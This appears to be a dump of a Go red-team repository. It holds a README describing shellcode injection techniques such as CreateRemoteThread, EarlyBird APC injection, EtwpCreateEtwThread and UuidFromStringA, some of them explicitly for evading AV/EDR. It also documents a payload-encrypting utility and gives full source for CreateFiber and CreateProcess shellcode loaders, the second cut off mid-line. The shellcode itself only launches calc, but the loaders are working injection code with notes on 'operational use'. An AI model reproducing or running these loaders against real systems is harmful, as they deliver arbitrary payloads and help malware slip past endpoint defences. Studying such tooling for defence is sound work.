| ## CreateRemoteThread 54 | 55 | This application leverages the Windows [CreateRemoteThread](https://docs.microsoft.com/en-us/windows/win32/api/processthreadsapi/nf-processthreadsapi-createremotethread) function from `Kernel32.dll` to execute shellocde in a remote process. The application requires that the target process to inject into is already running. The targe Process Identifier (PID) can provided at runtime for testing using the `-pid` command line flag. Hardcode the PID in the following line of code for operational use by replacing the `0` with your target PID: 56 | 57 | `pid := flag.Int("pid", 0, "Process ID to inject shellcode into")` 58 | 59 | This application leverages functions from the `golang.org/x/sys/windows` package, where feasible, like the [`windows.OpenProcess()`](https://github.com/golang/sys/blob/a7d97aace0b0/windows/zsyscall_windows.go#L1197). The application can be compiled wit the following command on a Windows host from the project's root directory: 60 | 61 | `set GOOS=windows GOARCH=amd64;go build -o CreateRemoteThread.exe .\cmd\CreateRemoteThread\main.go` 62 | 63 | ## CreateRemoteThreadNative 64 | 65 | This application leverages the Windows [CreateRemoteThread](https://docs.microsoft.com/en-us/windows/win32/api/processthreadsapi/nf-processthreadsapi-createremotethread) function from `Kernel32.dll` to execute shellocde in a remote process. The application requires that the target process to inject into is already running. The targe Process Identifier (PID) can provided at runtime for testing using the `-pid` command line flag. Hardcode the PID in the following line of code for operational use by replacing the `0` with your target PID: 66 | 67 | `pid := flag.Int("pid", 0, "Process ID to inject shellcode into")` 68 | 69 | This application **DOES NOT** leverage functions from the `golang.org/x/sys/windows` package. The most significant difference is that this application loads all the necessary DLLs and Procedures itself and uses the procedure's Call() function. The application can be compiled with the following command on Windows host from the project's root directory: 70 | 71 | `set GOOS=windows GOARCH=amd64;go build -o CreateRemoteThreadNative.exe .\cmd\CreateRemoteThreadNative\main.go` 72 | 73 | ## CreateThread 74 | 75 | This application leverages the Windows [CreateThread](https://docs.microsoft.com/en-us/windows/win32/api/processthreadsapi/nf-processthreadsapi-createthread) function from `Kernel32.dll` to execute shellcode within this application's process. This is usefull when you want to avoid remote process injection. This application leverages functions from the `golang.org/x/sys/windows` package, where feasible, like the [windows.VirtualAlloc()`](https://github.com/golang/sys/blob/a7d97aace0b0/windows/zsyscall_windows.go#L1712). The application can be compiled with the following command on Windows host from the project's root directory: 76 | 77 | `set GOOS=windows GOARCH=amd64;go build -o CreateThread.exe .\cmd\CreateThread\main.go` 78 | 79 | ## CreateThreadNative 80 | 81 | This application leverages the Windows [CreateThread](https://docs.microsoft.com/en-us/windows/win32/api/processthreadsapi/nf-processthreadsapi-createthread) function from the `Kernel32.dll` to execute shellcode within this application's process. This is usefull when you want to avoid remote process injection. This application **DOES NOT** leverage functions from the `golang.org/x/sys/windows` package. The most significant difference is that this application loads all the necessary DLLs and Procedures itself and uses the procedure's Call() function. The application can be compiled with the following command on Windows host from the project's root directory: 82 | 83 | `set GOOS=windows GOARCH=amd64;go build -o CreateThreadNative.exe .\cmd\CreateThreadNative\main.go` 84 | 85 | ## EarlyBird 86 | 87 | The application leverages the Windows [CreateProcess](https://docs.microsoft.com/en-us/windows/win32/api/processthreadsapi/nf-processthreadsapi-createprocessw) function to create a process in a suspended state. Once the child process is suspended, the Windows [QueueUserAPC](https://docs.microsoft.com/en-us/windows/win32/api/processthreadsapi/nf-processthreadsapi-queueuserapc) function is used to add a UserAPC to the child process that points to the allocate shellcode. Next, [ResumeThread](https://docs.microsoft.com/en-us/windows/win32/api/processthreadsapi/nf-processthreadsapi-resumethread) is called, which subsequently calls the undocumented [NtTestAlert](http://undocumented.ntinternals.net/) function that will execute the created UserAPC and in turn the shellcode. This is usefull because the shellcode will execute before AV/EDR can hook functions to support detection. Reference [New 'Early Bird' Code Injection Technique Discovered](https://www.cyberbit.com/blog/endpoint-security/new-early-bird-code-injection-technique-discovered/). The application can be compiled with the following command on Windows host from the project's root directory: 88 | 89 | `export GOOS=windows GOARCH=amd64;go build -o goEarlyBird.exe cmd\EarlyBird\main.go` 90 | 91 | ## EtwpCreateEtwThread 92 | 93 | This application leverages the Windows [EtwpCreateEtwThread](https://www.geoffchappell.com/studies/windows/win32/ntdll/api/etw/index.htm) function from `ntdll.dll` to execute shellcode within this application's process. Original work by [TheWover](https://gist.github.com/TheWover/b2b2e427d3a81659942f4e8b9a978dc3). This is usefull when you want to avoid remote process injection. This application **DOES NOT** leverage functions from the `golang.org/x/sys/windows` package. The most significant difference is that this application loads all the necessary DLLs and Procedures itself and uses the procedure's Call() function. The application can be compiled with the following command on a Windows host from the project's root directory: 94 | 95 | `set GOOS=windows GOARCH=amd64;go build -o EtwpCreateEtwThread.exe .\cmd\EtwpCreateEtwThread\main.go` 96 | 97 | ## NtQueueApcThreadEx (local) 98 | 99 | This application uses the undocumented [NtQueueApcThreadEx](https://docs.rs/ntapi/0.3.1/ntapi/ntpsapi/fn.NtQueueApcThreadEx.html) to create a "Special User APC" in the current thread of the current process to execute shellcode. Because the shellcode is loaded and executed in the current process, it is "local". This same technique can be used for a remote process. *NOTE:* This will only work on Windows 7 or later. Reference [APC Series: User APC API](https://repnz.github.io/posts/apc/user-apc/). 100 | 101 | `export GOOS=windows GOARCH=amd64;go build -o goNtQueueApcThreadEx-Local.exe cmd\NtQueueApcThreadEx-Local\main.go` 102 | 103 | ## RtlCreateUserThread 104 | 105 | This application leverages the Windows [RtlCreateUserThread](https://undocumented.ntinternals.net/index.html?page=UserMode%2FUndocumented%20Functions%2FExecutable%20Images%2FRtlCreateUserThread.html) function from `ntdll.dll` to execute shellocde in a remote process. The application requires that the target process to inject into is already running. The targe Process Identifier (PID) can provided at runtime for testing using the `-pid` command line flag. Hardcode the PID in the following line of code for operational use by replacing the `0` with your target PID: 106 | 107 | `pid := flag.Int("pid", 0, "Process ID to inject shellcode into")` 108 | 109 | This application **DOES NOT** leverage functions from the `golang.org/x/sys/windows` package. The most significant difference is that this application loads all the necessary DLLs and Procedures itself and uses the procedure's Call() function. The application can be compiled with the following command on a Windows host from the project's root directory: 110 | 111 | `set GOOS=windows GOARCH=amd64;go build -o RtlCreateUserThread.exe .\cmd\RtlCreateUserThread\main.go` 112 | 113 | ## Syscall 114 | 115 | This application executes Shellcode in the current running proccess by making a Syscall on the Shellcode's entry point. This application **DOES NOT** leverage functions from the `golang.org/x/sys/windows` package. The application can be compiled with the following command on a Windows host from the project's root directory: 116 | 117 | `set GOOS=windows GOARCH=amd64;go build -o Syscall.exe .\cmd\Syscall\main.go` 118 | 119 | ## UuidFromStringA 120 | 121 | This application leverages the Windows [UuidFromStringA](https://docs.microsoft.com/en-us/windows/win32/api/rpcdce/nf-rpcdce-uuidfromstringa) function to load shellcode to a memory address and then calls the [EnumSystemLocalesA](https://docs.microsoft.com/en-us/windows/win32/api/winnls/nf-winnls-enumsystemlocalesa) function to execute the shellcode. This method of loading and executing shellcode was derived from nccgroup's [RIFT: Analysing a Lazarus Shellcode Execution Method](https://research.nccgroup.com/2021/01/23/rift-analysing-a-lazarus-shellcode-execution-method/). For this application, memory is allocated on the heap and it does not use VirtualAlloc. The application can be compiled with the following command on a Windows host from the project's root directory: 122 | 123 | `set GOOS=windows GOARCH=amd64;go build -o UuidFromString.exe .\cmd\UuidFromString\main.go` 124 | 125 | ## ShellcodeUtils 126 | 127 | This application is used to transform shellcode binary files. The program depends that the input file is a binary file (.bin) that contains the hex bytes of the shellcode. ShellcodeUtils can just base64 encode your input file or it can XOR, RC4, or AES256-GCM encrypt it. The tools can also be used to decrypt files as well. 128 | 129 | ShellcodeUtils help menu: 130 | 131 | ```text 132 | -base64 133 | Base64 encode the output. Can be used with or without encryption 134 | -i string 135 | Input file path of binary file 136 | -key string 137 | Encryption key 138 | -mode string 139 | Mode of operation to perform on the input file [encrypt,decrypt] (default "encrypt") 140 | -nonce string 141 | Nonce, in hex, used to decrypt an AES256 input file. Only used during decryption 142 | -o string 143 | Output file path 144 | -salt string 145 | Salt, in hex, used to generate an AES256 32-byte key through Argon2. Only used during decryption 146 | -type string 147 | The type of encryption to use [xor, aes256, rc4, null] 148 | -v Enable verbose output 149 | ``` 150 | 151 | Example of only Base64 encoding the input file and saving it a text file: 152 | 153 | ```text 154 | PS C:\Users\bob> .\ShellcodeUtils.exe -i C:\Users\bob\calc.bin -o C:\Users\bob\calc.b64.txt -base64 -v 155 | [-]Output directory: C:\Users\bob\ 156 | [-]Output file name: calc.b64.txt 157 | [-]File contents (hex): 505152535657556a605a6863616c6354594883ec2865488b32488b7618488b761048ad488b30488b7e3003573c8b5c17288b741f204801fe8b541f240fb72c178d5202ad813c0757696e4575ef8b741f1c4801fe8b34ae4801f799ffd74883c4305d5f5e5b5a5958c3 158 | [-]No encryption type provided, continuing on... 159 | [+]Output (string): 160 | UFFSU1ZXVWpgWmhjYWxjVFlIg+woZUiLMkiLdhhIi3YQSK1IizBIi34wA1c8i1wXKIt0HyBIAf6LVB8kD7csF41SAq2BPAdXaW5Fde+LdB8cSAH+izSuSAH3mf/XSIPEMF1fXltaWVjD 161 | [+] encrypt input and wrote 140 bytes to: C:\Users\bob\calc.b64.txt 162 | ``` 163 | 164 | Example XOR encrypting input file with a key of `Sh3!1z` AND base64 encoding the output: 165 | 166 | ```text 167 | PS C:\Users\bob> .\ShellcodeUtils.exe -i C:\Users\bob\calc.bin -o C:\Users\bob\calc.xor.b64.txt -mode encrypt -type xor -key Sh3!1z -v 168 | [-]Output directory: C:\Users\bob\ 169 | [-]Output file name: calc.xor.b64.txt 170 | [-]File contents (hex): 505152535657556a605a6863616c6354594883ec2865488b32488b7618488b761048ad488b30488b7e3003573c8b5c17288b741f204801fe8b541f240fb72c178d5202ad813c0757696e4575ef8b741f1c4801fe8b34ae4801f799ffd74883c4305d5f5e5b5a5958c3 171 | [-]XOR encrypting input file with key: Sh3!1z 172 | [+]Output (hex): 173 | 03396172672d0602537b5919320450756832d0841b4479f16120b8572932d81e23699c32d8587baa4f4a503f0faa6d6d7be3473e11325296b8752e5e5cdf1f36bc2851c5b21d362d3a067654def127772f693084d85c9d69308dca97e469b2be63356c7f6a200a30f0 174 | [+]xor encrypt input and wrote 105 bytes to: C:\Users\bob\calc.xor.b64.txt 175 | ``` 176 | 177 | Example AES256-GCM encrypting the input file with a password of `Sh3!1z` WITHOUT base64 encoding the ouput: 178 | 179 | ```text 180 | PS C:\Users\bob> .\ShellcodeUtils.exe -i C:\Users\bob\calc.bin -o C:\Users\bob\calc.aes.bin -mode encrypt -type aes256 -key Sh3!1z -v 181 | [-]Output directory: C:\Users\bob\ 182 | [-]Output file name: calc.aes.bin 183 | [-]File contents (hex): 505152535657556a605a6863616c6354594883ec2865488b32488b7618488b761048ad488b30488b7e3003573c8b5c17288b741f204801fe8b541f240fb72c178d5202ad813c0757696e4575ef8b741f1c4801fe8b34ae4801f799ffd74883c4305d5f5e5b5a5958c3 184 | [-]AES256 encrypting input file 185 | [+]Argon2 salt (hex): db6126d3ac640f8aaa67cda74b8cf1d2c54513db7bf4fbe3422d1b276af1367e 186 | [+]AES256 key (32-bytes) derived from input password Sh3!1z (hex): 096a40f1aef38dd9b5d63284acc19727c4420dd98f21ea052112bef63eb7d94a 187 | [+]AES256 nonce (hex): 13802153c4b2fb6a3e545ff4 188 | [+]Output (hex): 189 | 44a974233e37b460dc2181b16846f265e8e3a07959abf9c8760f7d0ac8029575e67571ea5b313bc8b011739db57c690ec156a4b0bba4e4d632c35c1490aeaac24f5ae05e90934adf57798ee3c702a3c27073fe976fbcc6ee5db355da186c1add58913e41a8c5716a0fcfc27371f0cae906e50e680366496a00 190 | [+]aes256 encrypt input and wrote 121 bytes to: C:\Users\bob\calc.aes.bin 191 | ``` 192 | 193 | AES256 requires a 32-byte key. This program uses the Argon2 ID algorithm to take the password provided with the `-key` input paramter to derive a 32-byte key while using a randomly generate salt. You will need the same input password and the salt used with the Argon2 algorithm and the same nonce used with the AES256 algorithm to successfull decrypt the file. Alternatively, the decryption function _could_ be updated to just use the 32-byte Argon2 key instead of the input password and salt. 194 | 195 | >**NOTE:** It is up to the operator to decide to just use the generated Argon2 key or to use the password and salt that are used to generate the password. 196 | 197 | Example AES256 decrypting the input file: 198 | 199 | ```text 200 | PS C:\Users\bob> .\ShellcodeUtils.exe -i C:\Users\bob\calc.aes.bin -o C:\Users\bob\calc.aes.decrypted.bin -mode decrypt -type aes256 -key Sh3!1z -nonce 13802153c4b2fb6a3e545ff4 -salt db6126d3ac640f8aaa67cda74b8cf1d2c54513db7bf4fbe3422d1b276af1367e -v 201 | [-]Output directory: C:\Users\bob\ 202 | [-]Output file name: calc.aes.decrypted.bin 203 | [-]File contents (hex): 44a974233e37b460dc2181b16846f265e8e3a07959abf9c8760f7d0ac8029575e67571ea5b313bc8b011739db57c690ec156a4b0bba4e4d632c35c1490aeaac24f5ae05e90934adf57798ee3c702a3c27073fe976fbcc6ee5db355da186c1add58913e41a8c5716a0fcfc27371f0cae906e50e680366496a00 204 | [-]AES256 decrypting input file 205 | [-]Argon2 salt (hex): db6126d3ac640f8aaa67cda74b8cf1d2c54513db7bf4fbe3422d1b276af1367e 206 | [-]AES256 key (hex): 096a40f1aef38dd9b5d63284acc19727c4420dd98f21ea052112bef63eb7d94a 207 | [-]AES256 nonce (hex): 13802153c4b2fb6a3e545ff4 208 | [+]Output (hex): 209 | 505152535657556a605a6863616c6354594883ec2865488b32488b7618488b761048ad488b30488b7e3003573c8b5c17288b741f204801fe8b541f240fb72c178d5202ad813c0757696e4575ef8b741f1c4801fe8b34ae4801f799ffd74883c4305d5f5e5b5a5958c3 210 | [+]aes256 decrypt input and wrote 105 bytes to: C:\Users\bob\calc.aes.decrypted.bin 211 | ``` 212 | 213 | The application can be compiled with the following command on a Windows host from the project's root directory: 214 | 215 | `set GOOS=windows GOARCH=amd64;go build -o ShellcodeUtils.exe .\cmd\ShellcodeUtils\main.go` 216 | -------------------------------------------------------------------------------- /cmd/CreateFiber/main.go: -------------------------------------------------------------------------------- 1 | // +build windows 2 | 3 | /* 4 | This program executes shellcode in the current process using the following steps 5 | 1. Convert the main thread into a fiber with the ConvertThreadToFiber function 6 | 2. Allocate memory for the shellcode with VirtualAlloc setting the page permissions to Read/Write 7 | 3. Use the RtlCopyMemory macro to copy the shellcode to the allocated memory space 8 | 4. Change the memory page permissions to Execute/Read with VirtualProtect 9 | 5. Call CreateFiber on shellcode address 10 | 6. Call SwitchToFiber to start the fiber and execute the shellcode 11 | 12 | NOTE: Currently this program will NOT exit even after the shellcode has been executed. You must force terminate this process 13 | 14 | This program loads the DLLs and gets a handle to the used procedures itself instead of using the windows package directly. 15 | Reference: https://ired.team/offensive-security/code-injection-process-injection/executing-shellcode-with-createfiber 16 | */ 17 | 18 | package main 19 | 20 | import ( 21 | "encoding/hex" 22 | "flag" 23 | "fmt" 24 | "log" 25 | "unsafe" 26 | 27 | // Sub Repositories 28 | "golang.org/x/sys/windows" 29 | ) 30 | 31 | const ( 32 | // MEM_COMMIT is a Windows constant used with Windows API calls 33 | MEM_COMMIT = 0x1000 34 | // MEM_RESERVE is a Windows constant used with Windows API calls 35 | MEM_RESERVE = 0x2000 36 | // PAGE_EXECUTE_READ is a Windows constant used with Windows API calls 37 | PAGE_EXECUTE_READ = 0x20 38 | // PAGE_READWRITE is a Windows constant used with Windows API calls 39 | PAGE_READWRITE = 0x04 40 | ) 41 | 42 | func main() { 43 | verbose := flag.Bool("verbose", false, "Enable verbose output") 44 | debug := flag.Bool("debug", false, "Enable debug output") 45 | flag.Parse() 46 | 47 | // Pop Calc Shellcode 48 | shellcode, errShellcode := hex.DecodeString("505152535657556A605A6863616C6354594883EC2865488B32488B7618488B761048AD488B30488B7E3003573C8B5C17288B741F204801FE8B541F240FB72C178D5202AD813C0757696E4575EF8B741F1C4801FE8B34AE4801F799FFD74883C4305D5F5E5B5A5958C3") 49 | if errShellcode != nil { 50 | log.Fatal(fmt.Sprintf("[!]there was an error decoding the string to a hex byte array: %s", errShellcode.Error())) 51 | } 52 | 53 | if *debug { 54 | fmt.Println("[DEBUG]Loading kernel32.dll and ntdll.dll") 55 | } 56 | kernel32 := windows.NewLazySystemDLL("kernel32.dll") 57 | ntdll := windows.NewLazySystemDLL("ntdll.dll") 58 | 59 | if *debug { 60 | fmt.Println("[DEBUG]Loading VirtualAlloc, VirtualProtect and RtlCopyMemory procedures") 61 | } 62 | VirtualAlloc := kernel32.NewProc("VirtualAlloc") 63 | VirtualProtect := kernel32.NewProc("VirtualProtect") 64 | RtlCopyMemory := ntdll.NewProc("RtlCopyMemory") 65 | ConvertThreadToFiber := kernel32.NewProc("ConvertThreadToFiber") 66 | CreateFiber := kernel32.NewProc("CreateFiber") 67 | SwitchToFiber := kernel32.NewProc("SwitchToFiber") 68 | 69 | if *debug { 70 | fmt.Println("[DEBUG]Calling ConvertThreadToFiber...") 71 | } 72 | 73 | fiberAddr, _, errConvertFiber := ConvertThreadToFiber.Call() 74 | 75 | if errConvertFiber != nil && errConvertFiber.Error() != "The operation completed successfully." { 76 | log.Fatal(fmt.Sprintf("[!]Error calling ConvertThreadToFiber:\r\n%s", errConvertFiber.Error())) 77 | } 78 | 79 | if *verbose { 80 | fmt.Println(fmt.Sprintf("[-]Fiber address: %x", fiberAddr)) 81 | } 82 | 83 | if *debug { 84 | fmt.Println("[DEBUG]Calling VirtualAlloc for shellcode") 85 | } 86 | addr, _, errVirtualAlloc := VirtualAlloc.Call(0, uintptr(len(shellcode)), MEM_COMMIT|MEM_RESERVE, PAGE_READWRITE) 87 | 88 | if errVirtualAlloc != nil && errVirtualAlloc.Error() != "The operation completed successfully." { 89 | log.Fatal(fmt.Sprintf("[!]Error calling VirtualAlloc:\r\n%s", errVirtualAlloc.Error())) 90 | } 91 | 92 | if addr == 0 { 93 | log.Fatal("[!]VirtualAlloc failed and returned 0") 94 | } 95 | 96 | if *verbose { 97 | fmt.Println(fmt.Sprintf("[-]Allocated %d bytes", len(shellcode))) 98 | } 99 | 100 | if *debug { 101 | fmt.Println("[DEBUG]Copying shellcode to memory with RtlCopyMemory") 102 | } 103 | _, _, errRtlCopyMemory := RtlCopyMemory.Call(addr, (uintptr)(unsafe.Pointer(&shellcode[0])), uintptr(len(shellcode))) 104 | 105 | if errRtlCopyMemory != nil && errRtlCopyMemory.Error() != "The operation completed successfully." { 106 | log.Fatal(fmt.Sprintf("[!]Error calling RtlCopyMemory:\r\n%s", errRtlCopyMemory.Error())) 107 | } 108 | if *verbose { 109 | fmt.Println("[-]Shellcode copied to memory") 110 | } 111 | 112 | if *debug { 113 | fmt.Println("[DEBUG]Calling VirtualProtect to change memory region to PAGE_EXECUTE_READ") 114 | } 115 | 116 | oldProtect := PAGE_READWRITE 117 | _, _, errVirtualProtect := VirtualProtect.Call(addr, uintptr(len(shellcode)), PAGE_EXECUTE_READ, uintptr(unsafe.Pointer(&oldProtect))) 118 | if errVirtualProtect != nil && errVirtualProtect.Error() != "The operation completed successfully." { 119 | log.Fatal(fmt.Sprintf("Error calling VirtualProtect:\r\n%s", errVirtualProtect.Error())) 120 | } 121 | if *verbose { 122 | fmt.Println("[-]Shellcode memory region changed to PAGE_EXECUTE_READ") 123 | } 124 | 125 | if *debug { 126 | fmt.Println("[DEBUG]Calling CreateFiber...") 127 | } 128 | 129 | fiber, _, errCreateFiber := CreateFiber.Call(0, addr, 0) 130 | 131 | if errCreateFiber != nil && errCreateFiber.Error() != "The operation completed successfully." { 132 | log.Fatal(fmt.Sprintf("[!]Error calling CreateFiber:\r\n%s", errCreateFiber.Error())) 133 | } 134 | 135 | if *verbose { 136 | fmt.Println(fmt.Sprintf("Shellcode fiber created: %x", fiber)) 137 | } 138 | 139 | if *debug { 140 | fmt.Println("[DEBUG]Calling SwitchToFiber function to execute the shellcode") 141 | } 142 | 143 | _, _, errSwitchToFiber := SwitchToFiber.Call(fiber) 144 | 145 | if errSwitchToFiber != nil && errSwitchToFiber.Error() != "The operation completed successfully." { 146 | log.Fatal(fmt.Sprintf("[!]Error calling SwitchToFiber:\r\n%s", errSwitchToFiber.Error())) 147 | } 148 | 149 | if *verbose { 150 | fmt.Println("[+]Shellcode Executed") 151 | } 152 | 153 | if *debug { 154 | fmt.Println("[DEBUG]Calling SwitchToFiber on main thread/fiber") 155 | } 156 | 157 | _, _, errSwitchToFiber2 := SwitchToFiber.Call(fiberAddr) 158 | 159 | if errSwitchToFiber2 != nil && errSwitchToFiber2.Error() != "The operation completed successfully." { 160 | log.Fatal(fmt.Sprintf("[!]Error calling SwitchToFiber:\r\n%s", errSwitchToFiber2.Error())) 161 | } 162 | } 163 | 164 | // export GOOS=windows GOARCH=amd64;go build -o goCreateFiberNative.exe cmd/CreateFiber/main.go 165 | -------------------------------------------------------------------------------- /cmd/CreateProcess/main.go: -------------------------------------------------------------------------------- 1 | // +build windows 2 | 3 | package main 4 | 5 | import ( 6 | "encoding/binary" 7 | "encoding/hex" 8 | "flag" 9 | "fmt" 10 | "log" 11 | "os" 12 | "syscall" 13 | "unsafe" 14 | 15 | // Sub Repositories 16 | "golang.org/x/sys/windows" 17 | ) 18 | 19 | func main() { 20 | verbose := flag.Bool("verbose", false, "Enable verbose output") 21 | debug := flag.Bool("debug", false, "Enable debug output") 22 | program := flag.String("program", "C:\\Windows\\System32\\notepad.exe", "The program to start and inject shellcode into") 23 | args := flag.String("args", "", "Program command line arguments") 24 | flag.Usage = func() { 25 | flag.PrintDefaults() 26 | os.Exit(0) 27 | } 28 | flag.Parse() 29 | 30 | // Pop Calc Shellcode (x64) 31 | shellcode, errShellcode := hex.DecodeString("505152535657556A605A6863616C6354594883EC2865488B32488B7618488B761048AD488B30488B7E3003573C8B5C17288B741F204801FE8B541F240FB72C178D5202AD813C0757696E4575EF8B741F1C4801FE8B34AE4801F799FFD74883C4305D5F5E5B5A5958C3") 32 | if errShellcode != nil { 33 | log.Fatal(fmt.Sprintf("[!]there was an error decoding the string to a hex byte array: %s", errShellcode.Error())) 34 | } 35 | 36 | if *debug { 37 | fmt.Println("[DEBUG]Loading kernel32.dll and ntdll.dll...") 38 | } 39 | 40 | // Load DLLs and Procedures 41 | kernel32 := windows.NewLazySystemDLL("kernel32.dll") 42 | ntdll := windows.NewLazySystemDLL("ntdll.dll") 43 | 44 | if *debug { 45 | fmt.Println("[DEBUG]Loading supporting procedures...") 46 | } 47 | VirtualAllocEx := kernel32.NewProc("VirtualAllocEx") 48 | VirtualProtectEx := kernel32.NewProc("VirtualProtectEx") 49 | WriteProcessMemory := kernel32.NewProc("WriteProcessMemory") 50 | NtQueryInformationProcess := ntdll.NewProc("NtQueryInformationProcess") 51 | 52 | // Create child proccess in suspended state 53 | /* 54 | BOOL CreateProcessW( 55 | LPCWSTR lpApplicationName, 56 | LPWSTR lpCommandLine, 57 | LPSECURITY_ATTRIBUTES lpProcessAttributes, 58 | LPSECURITY_ATTRIBUTES lpThreadAttributes, 59 | BOOL bInheritHandles, 60 | DWORD dwCreationFlags, 61 | LPVOID lpEnvironment, 62 | LPCWSTR lpCurrentDirectory, 63 | LPSTARTUPINFOW lpStartupInfo, 64 | LPPROCESS_INFORMATION lpProcessInformation 65 | ); 66 | */ 67 | 68 | if *debug { 69 | fmt.Println(fmt.Sprintf("[DEBUG]Calling CreateProcess to start:\r\n\t%s %s...", *program, *args)) 70 | } 71 | procInfo := &windows.ProcessInformation{} 72 | startupInfo := &windows.StartupInfo{ 73 | Flags: windows.STARTF_USESTDHANDLES | windows.CREATE_SUSPENDED, 74 | ShowWindow: 1, 75 | } 76 | errCreateProcess := windows.CreateProcess(syscall.StringToUTF16Ptr(*program), syscall.StringToUTF16Ptr(*args), nil, nil, true, windows.CREATE_SUSPENDED, nil, nil, startupInfo, procInfo) 77 | if errCreateProcess != nil && errCreateProcess.Error() != "The operation completed successfully." { 78 | log.Fatal(fmt.Sprintf("[!]Error calling CreateProcess:\r\n%s", errCreateProcess.Error())) 79 | } 80 | if *verbose { 81 | fmt.Println(fmt.Sprintf("[-]Successfully created the %s process in PID %d", *program, procInfo.ProcessId)) 82 | } 83 | 84 | // Allocate memory in child process 85 | if *debug { 86 | fmt.Println(fmt.Sprintf("[DEBUG]Calling VirtualAllocEx on PID %d...", procInfo.ProcessId)) 87 | } 88 | addr, _, errVirtualAlloc := VirtualAllocEx.Call(uintptr(procInfo.Process), 0, uintptr(len(shellcode)), windows.MEM_COMMIT|windows.MEM_RESERVE, windows.PAGE_READWRITE) 89 | 90 | if errVirtualAlloc != nil && errVirtualAlloc.Error() != "The operation completed successfully." { 91 | log.Fatal(fmt.Sprintf("[!]Error calling VirtualAlloc:\r\n%s", errVirtualAlloc.Error())) 92 | } 93 | 94 | if addr == 0 { 95 | log.Fatal("[!]VirtualAllocEx failed and returned 0") 96 | } 97 | if *verbose { 98 | fmt.Println(fmt.Sprintf("[-]Successfully allocated memory in PID %d", procInfo.ProcessId)) 99 | } 100 | if *debug { 101 | fmt.Println(fmt.Sprintf("[DEBUG]Shellcode address: 0x%x", addr)) 102 | } 103 | 104 | // Write shellcode into child process memory 105 | if *debug { 106 | fmt.Println(fmt.Sprintf("[DEBUG]Calling WriteProcessMemory on PID %d...", procInfo.ProcessId)) 107 | } 108 | _, _, errWriteProcessMemory := WriteProcessMemory.Call(uintptr(procInfo.Process), addr, (uintptr)(unsafe.Pointer(&shellcode[0])), uintptr(len(shellcode))) 109 | 110 | if errWriteProcessMemory != nil && errWriteProcessMemory.Error() != "The operation completed successfully." { 111 | log.Fatal(fmt.Sprintf("[!]Error calling WriteProcessMemory:\r\n%s", errWriteProcessMemory.Error())) 112 | } 113 | if *verbose { 114 | fmt.Println(fmt.Sprintf("[-]Successfully wrote %d shellcode bytes to PID %d", len(shellcode), procInfo.ProcessId)) 115 | } 116 | 117 | // Change memory permissions to RX in child process where shellcode was written 118 | if *debug { 119 | fmt.Println(fmt.Sprintf("[DEBUG]Calling VirtualProtectEx on PID %d...", procInfo.ProcessId)) 120 | } 121 | oldProtect := windows.PAGE_READWRITE 122 | _, _, errVirtualProtectEx := VirtualProtectEx.Call(uintptr(procInfo.Process), addr, uintptr(len(shellcode)), windows.PAGE_EXECUTE_READ, uintptr(unsafe.Pointer(&oldProtect))) 123 | if errVirtualProtectEx != nil && errVirtualProtectEx.Error() != "The operation completed successfully." { 124 | log.Fatal(fmt.Sprintf("Error calling VirtualProtectEx:\r\n%s", errVirtualProtectEx.Error())) 125 | } 126 | if *verbose { 127 | fmt.Println(fmt.Sprintf("[-]Successfully changed memory permissions to PAGE_EXECUTE_READ in PID %d", procInfo.ProcessId)) 128 | } 129 | 130 | // Query the child process and find its image base address from its Process Environment Block (PEB) 131 | // https://github.com/winlabs/gowin32/blob/0b6f3bef0b7501b26caaecab8d52b09813224373/wrappers/winternl.go#L37 132 | // http://bytepointer.com/resources/tebpeb32.htm 133 | // https://www.nirsoft.net/kernel_struct/vista/PEB.html 134 | type PEB struct { 135 | //reserved1 [2]byte // BYTE 0-1 136 | InheritedAddressSpace byte // BYTE 0 137 | ReadImageFileExecOptions byte // BYTE 1 138 | BeingDebugged byte // BYTE 2 139 | reserved2 [1]byte // BYTE 3 140 | // ImageUsesLargePages : 1; //0x0003:0 (WS03_SP1+) 141 | // IsProtectedProcess : 1; //0x0003:1 (Vista+) 142 | // IsLegacyProcess : 1; //0x0003:2 (Vista+) 143 | // IsImageDynamicallyRelocated : 1; //0x0003:3 (Vista+) 144 | // SkipPatchingUser32Forwarders : 1; //0x0003:4 (Vista_SP1+) 145 | // IsPackagedProcess : 1; //0x0003:5 (Win8_BETA+) 146 | // IsAppContainer : 1; //0x0003:6 (Win8_RTM+) 147 | // SpareBit : 1; //0x0003:7 148 | //reserved3 [2]uintptr // PVOID BYTE 4-8 149 | Mutant uintptr // BYTE 4 150 | ImageBaseAddress uintptr // BYTE 8 151 | Ldr uintptr // PPEB_LDR_DATA 152 | ProcessParameters uintptr // PRTL_USER_PROCESS_PARAMETERS 153 | reserved4 [3]uintptr // PVOID 154 | AtlThunkSListPtr uintptr // PVOID 155 | reserved5 uintptr // PVOID 156 | reserved6 uint32 // ULONG 157 | reserved7 uintptr // PVOID 158 | reserved8 uint32 // ULONG 159 | AtlThunkSListPtr32 uint32 // ULONG 160 | reserved9 [45]uintptr // PVOID 161 | reserved10 [96]byte // BYTE 162 | PostProcessInitRoutine uintptr // PPS_POST_PROCESS_INIT_ROUTINE 163 | reserved11 [128]byte // BYTE 164 | reserved12 [1]uintptr // PVOID 165 | SessionId uint32 // ULONG 166 | } 167 | 168 | // https://github.com/elastic/go-windows/blob/master/ntdll.go#L77 169 | type PROCESS_BASIC_INFORMATION struct { 170 | reserved1 uintptr // PVOID 171 | PebBaseAddress uintptr // PPEB 172 | reserved2 [2]uintptr // PVOID 173 | UniqueProcessId uintptr // ULONG_PTR 174 | InheritedFromUniqueProcessID uintptr // PVOID 175 | } 176 | 177 | if *debug { 178 | fmt.Println(fmt.Sprintf("[DEBUG]Calling NtQueryInformationProcess on %d...", procInfo.ProcessId)) 179 | } 180 | 181 | var processInformation PROCESS_BASIC_INFORMATION 182 | var returnLength uintptr 183 | ntStatus, _, errNtQueryInformationProcess := NtQueryInformationProcess.Call(uintptr(procInfo.Process), 0, uintptr(unsafe.Pointer(&processInformation)), unsafe.Sizeof(processInformation), returnLength) 184 | if errNtQueryInformationProcess != nil && errNtQueryInformationProcess.Error() != "The operation completed successfully." { 185 | log.Fatal(fmt.Sprintf("[!]Error calling NtQueryInformationProcess:\r\n\t%s", errNtQueryInformationProcess.Error())) 186 | } 187 | if ntStatus != 0 { 188 | if ntStatus == 3221225476 { 189 | log.Fatal("[!]Error calling NtQueryInformationProcess: STATUS_INFO_LENGTH_MISMATCH") // 0xc0000004 (3221225476) 190 | } 191 | fmt.Println(fmt.Sprintf("[!]NtQueryInformationProcess returned NTSTATUS: %x(%d)", ntStatus, ntStatus)) 192 | log.Fatal(fmt.Sprintf("[!]Error calling 